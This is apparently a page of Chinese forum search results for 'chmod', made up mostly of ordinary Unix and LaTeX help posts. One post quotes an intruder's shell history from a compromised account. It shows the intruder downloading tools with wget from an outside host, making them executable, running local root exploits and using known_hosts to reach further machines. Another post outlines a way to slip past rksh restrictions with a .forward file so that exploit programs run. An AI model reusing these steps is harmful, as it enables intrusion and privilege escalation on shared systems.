c****f 发帖数: 1102 | 1 chmod 700 filename
chown user:whatevergroup filename |
|
c****p 发帖数: 6474 | 2 she might not have the right, i.e. she is not the owner, to change that
particular directory.
under |
|
d****n 发帖数: 1637 | 3 1. find a file by name/pattern
2. find a exact word/pattern in text file, counters of this pattern/word.
exclude this word/pattern in this file and do the same
3. sort a table(numbers) print unique counts by x column.
4. replace/insert/delete pattern/word in a text file.
5. rename/move/copy files from prefix/suffix "xxx" to "yyy"
6. given a table with numbers, calculate the average/sum/stdv at column x,y
,z
7. how/how many ways to detach a process when the process is running? before
it starts?... 阅读全帖 |
|
p******g 发帖数: 347 | 4 can't you just check out, chmod in ur local working copy and commit back?
it has nothing to do with propset. |
|
|
w***g 发帖数: 5958 | 6 99%属于正常水平。
机器学习的结果,如果有谁claim 100%,就是unprofessional,直接可以滚蛋了。
现在有很多>99%的结果,我不是很信。
因为nmist已经在那里好几年了,大家说是cross-validation,
其实都是对着validate的结果调的hyper parameter。
很多deep learning框架都拿nmist做toy example。
我刚刚用lasagne跑了下,两分钟之内达到99%。
这个因改没太多over-fitting,因为CNN架构就是随便一个简单的,
没有专门为nmist优化的迹象。
估计多循环几次还能上去。不过就像guvest说的
1和7, 0和9 这个很难全弄对。就是validation准确率上去,
我其实也不信。就像我们用一个仪器测东西有额定精度,
dataset做evaluation也有精度。我觉得nmist这个dataset
的精度应该在99%一下。用这个dataset测出>99%的精度
没有意义。
要看dataset的同学我已经导好了
http://www.aaalgo.com/picpac/datasets/nm... 阅读全帖 |
|
f**y 发帖数: 138 | 7 很多供学生使用的mail server用rksh来限制用户运行exploit程序,
但rksh似乎有一点没防到。就是通过.forward文件可以给自己发
信来运行自己目录里的程序。对于没有chmod命令可用的时候,
可以用cp命令从系统中拷个有x权的script文件,进行编辑并通过
email让它给exploit程序加x权,并运行之。 |
|
l**p 发帖数: 474 | 8 chmod o+r filename....
then you can operate the file. |
|
r***t 发帖数: 78 | 9 那如果我想设置HTTP server,联网的时候该怎么办?有没有象UNIX的
chmod的办法?
谢谢! |
|
w*****n 发帖数: 94 | 10 Why do you need chmod? If you want to give different HTTP access
according to different user, refer to your HTTP server manual. |
|
w**e 发帖数: 7 | 11 最近学校管安全的通知我们,说我们的FTP server的CHMOD
功能没有关闭,不安全。在下没有经验,发信问他们怎么才
能关闭,结果好几天都没有回音。
自己看了一下man page,好象也没有什么特别的选项来关闭
它,而且发现FTPD里还有很多类似的功能都不太安全。哪位
有经验的大虾指点指点。谢谢! |
|
y*j 发帖数: 32 | 12 我在学校里面,收发 Email 都喜欢 ssh 到系
服务器上后用 pine。今日忽然发现有人用我的
用户名和密码登陆:黑客太牛了,居然知道我的
密码。而且,他从我的 .ssh 目录下知道我还
ssh 过其他地方,于是他一个一个登陆过去,
都知道用户名和密码!都不知道他是怎么弄的。
幸好他好象也没有干一些坏事情,例如删除文件
发 Email 之类的。下面是我的 .history
各位高手看看怎么回事,怎么解决。
cd .ssh
cat known_hosts
uname -a
w
wget another00.home.ro/ups
chmod +x ups
./ups
wget another00.home.ro/local1.tgz
cd local
tar -xzvf local1.tgz
cd local
./mem
id
./t
./prt
./su
ls
./brk
另一个服务器上的:
#+1093705127
uname -a
#+1093705131
cd .ssh
#+1093705144
cat /etc/hosts
#+1093705173
wget www.ge |
|
s*******k 发帖数: 71 | 13
Okay, the detailed instruction :-))
(1) CXTERM should come with font files named:
gb16fs.pcf/gb16st.pcf (GB), and hku16et.pcf (BIG5)
(2) create a directory, say /homes/flguy/fonts, put these font files
there, use chmod 755 to make this directory and font files world accessible.
(3) create a file called fonts.alias with the following content (three lines)
the file has to be in the same directory.
hanzigb16st "-isas-song ti-medium-r-normal--16-160-72-72-c-160-gb2312.
1980-0"
hanzigb16fs "-isas-fa |
|
c****l 发帖数: 88 | 14 这几天需要在win7*64bit里面安装cygwin,但是安装完成以后每打开一个terminal都回
跳出一个黑色的窗口,一旦关闭那个黑色的窗口,terminal也就被关了,请问有人知道
这个应该怎么处理吗?
另外,当我通过cygwin运行一些程序的时候,经常出现permission is denied情况,
chmod -R 777* 也没有办法解决,手动在windows里面把read-only改了以后还会自动变
回来,请问这是什么状况?有人知道怎么解决吗?
多谢大家帮忙!新年快乐! |
|
p****s 发帖数: 32405 | 15 出错消息说jpeg2eps.ps 和vieweps.ps syntax error. unexpected token 啥的.
郁闷, 我已经照做chmod +x, 还有把它们所在路径都改在PATH以内了. |
|
s*****g 发帖数: 5159 | 16 make a file, namely latexcompile.sh
put the following in the content of the file
rm -f Supporting-information.pdf
latex Supporting-information.tex
bibtex Supporting-information
latex Supporting-information.tex
latex Supporting-information.tex
dvi2pdf Supporting-information.dvi
save and exit.
Doe the following ONCE.
> chmod +x latexcompile.sh
Everytime, you could compile by
./latexcompile.sh
or
sh ./latexcompile.sh |
|
j***y 发帖数: 87 | 17 you can search xlockmore in every search engine
you can also try to chmod 000 xlock |
|
|
m*****e 发帖数: 4193 | 19 make sure chmod +x ~/.procmailrc
make sure sh is in /usr/bin (most likely it's /bin/sh). |
|
l*l 发帖数: 225 | 20 看到前面有不少讲cxterm的说明, 很好用, 但对于新手很难, 如下方法可以很快搞定:
其实cxterm运行只需要三个文件:
1) cxterm 可执行文件
2) ~/.Xdefaults 输入法定位文件
3) path/to/dict/gb 输入法table文件
因此你只需要从朋友或者XX那里考备这三个文件(第三个是目录)然后对~/.Xdefaults
稍微修改就OK了.
cxterm 只要是同一种UNIX/Linux就可以了, 例如hp-10.2 可以兼容hpux.
将之放在自己的 ~/bin/里, 别忘记 chmod a+x cxterm !!!
~/.Xdefaults当然在自己目录里了, 修改这个地方:
cxterm*hanziInputDir: /home/people/llu/dict/gb
上面是我的例子
path/to/dict/gb 里应该放table 文件, 应该有如下文件:
CCDOSPY.cit English.cit PY.cit QianMa.cit TeleCode.cit
CTLau.cit HIRAGANA.cit P |
|
t********e 发帖数: 880 | 21 RAR self-extracting archive
chmod u+x rar.sfx
./rar.sfx |
|
su 发帖数: 149 | 22 root为什么不能写"home"目录?
甚至"chmod ... home"也不能成功。
我是先用普通用户远程登录在用"su"切换成root的。
难道一定得在本地直接用su登录才行吗? |
|
|
c********l 发帖数: 447 | 24 you may try "chmod 755 $HOME"
but remember to change other directory/file's access right
to protect your privacy. |
|